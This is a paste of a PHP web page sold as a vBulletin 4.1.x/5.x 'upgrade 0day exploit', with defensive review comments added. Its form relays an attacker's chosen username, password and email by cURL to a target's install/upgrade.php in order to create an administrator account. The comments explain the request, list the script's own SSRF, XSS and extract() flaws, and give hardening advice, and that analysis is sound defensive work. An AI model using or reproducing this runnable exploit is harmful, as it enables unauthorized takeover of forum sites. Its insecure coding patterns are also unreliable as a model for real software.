
CSRF vbulletin 0day

a guest
Aug 23rd, 2017
  1. <!DOCTYPE HTML>
     <!--
       Review note (defensive reading of this paste):
       One page holding a form plus a PHP handler. On submit, the handler relays the
       operator-supplied values as a single server-side cURL POST to the URL typed into
       the "Website" field; the form's own example points at a vBulletin
       install/upgrade.php. Despite the paste title, no cross-site request forgery is
       involved: the request is issued by this script's host, not by a victim's browser.
       The request depends on the target's upgrade script being reachable and on a
       customer ID value (sent both as a form field and as the bbcustomerid cookie).
       How the target responds is not shown here; "Inject Admin" is the author's claim.
       Hardening and detection: remove or block web access to the forum's install
       directory once an upgrade is finished, and treat POSTs to install/upgrade.php
       that carry htmldata[...] parameters outside a maintenance window as an alert.
     -->
  2.  
  3. <html>
  4. <title>vBulletin 0day Exploit!</title>
  5. <body bgcolor=#000000>
  6. <center>
  7. <pre><font color=#ffffff><link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
  8. <font face="Ubuntu Mono" size="5" color="#ffffff">vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</font><br>
  9. <a href="https://www.facebook.com/gzinflate/" target="_blank">Me!</a>
  10. <br>
  11. <?php
  12. //extract data from the post
  13. if(isset($_POST['submit'])){
      // NOTE(review): extract() on raw $_POST lets the request define or overwrite any
      // variable in this scope. $fields_string is appended to below without being
      // initialised, so a posted "fields_string" value would be prepended to the
      // outgoing body. Every value used below is read from $_POST explicitly, so this
      // call adds only risk.
  14. extract($_POST);
  15.  
  16. //set POST variables
      // NOTE(review): the destination is taken verbatim from the form, with no scheme
      // or host validation. Anyone who can reach this page can make the hosting server
      // send POSTs to an arbitrary URL (server-side request forgery risk for the host).
  17. $url = $_POST['url'];
      // Fixed parameters plus the four operator-supplied values, each passed through
      // urlencode(). The password is sent twice (password and confirmpassword).
  18. $fields = array(
  19. 'ajax' => urlencode('1'),
  20. 'version' => urlencode('install'),
  21. 'checktable' => urlencode('false'),
  22. 'firstrun' => urlencode('false'),
  23. 'step' => urlencode('7'),
  24. 'startat' => urlencode('0'),
  25. 'only' => urlencode('false'),
  26. 'customerid' => urlencode($_POST['customerid']),
  27. 'options[skiptemplatemerge]' => urlencode('0'),
  28. 'response' => urlencode('yes'),
  29. 'htmlsubmit' => urlencode('1'),
  30. 'htmldata[username]' => urlencode($_POST['username']),
  31. 'htmldata[password]' => urlencode($_POST['password']),
  32. 'htmldata[confirmpassword]' => urlencode($_POST['password']),
  33. 'htmldata[email]' => urlencode($_POST['email'])
  34. );
  35.  
  36. //url-ify the data for the POST
      // The array keys are concatenated as-is (only the values were urlencode()d), and
      // $fields_string has no initial assignment before the first .= (see the note on
      // extract() above).
  37. foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
      // rtrim() returns the trimmed string and does not modify its argument; the
      // return value is discarded here, so $fields_string is unchanged by this line.
  38. rtrim($fields_string, '&');
  39.  
  40. //open connection
  41. $ch = curl_init();
  42.  
  43. //set the url, number of POST vars, POST data
  44. curl_setopt($ch,CURLOPT_URL, $url);
      // CURLOPT_POST is an on/off switch; count($fields) is simply a truthy value here.
  45. curl_setopt($ch,CURLOPT_POST, count($fields));
  46. curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
      // Starts a new cookie session; no cookie file is configured in this script.
  47. curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
      // The cookie value is concatenated from the form input without any encoding.
  48. curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
  49.  
  50. //execute post
      // NOTE(review): CURLOPT_RETURNTRANSFER is not set, so cURL writes the remote
      // response directly into this page's output, unescaped, and $result receives
      // only a boolean. Whatever markup the remote side returns is rendered in the
      // operator's browser under this page's origin.
  51. $result = curl_exec($ch);
  52.  
  53. //close connection
  54. curl_close($ch);
      // Stops here on submit, so the form below is not rendered after a request.
  55. exit();
  56. }
  57. ?>
  58. <center>
      <!--
        NOTE(review): the form action echoes REQUEST_URI without HTML escaping, so a
        crafted request path or query string is reflected into the attribute (reflected
        XSS in this page itself); htmlspecialchars() with ENT_QUOTES is the usual guard.
        The form has no anti-CSRF token and no access control, and the password field
        is a plain text input, so the value is shown in clear on screen.
      -->
  59. <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
  60. <span>Example: http://localhost/path/install/upgrade.php</span><br>
  61. <span>Website:</span><input name="url" type="text" tabindex="1" size="60" />
  62. <br><span>Customer ID:</span><input name="customerid" type="text" tabindex="2" size="40" />
  63. <br><span>Username:</span><input name="username" type="text" tabindex="3" size="40" />
  64. <br><span>Password:</span><input name="password" type="text" tabindex="4" size="40" />
  65. <br><span>Email:</span><input name="email" type="text" tabindex="5" maxlength="40" />
  66.  
  67. <input name="submit" type="submit" value="Inject Admin">
  68.  
  69. </form>
  70. </center>
  71. </pre>
  72. </font>
  73. </html>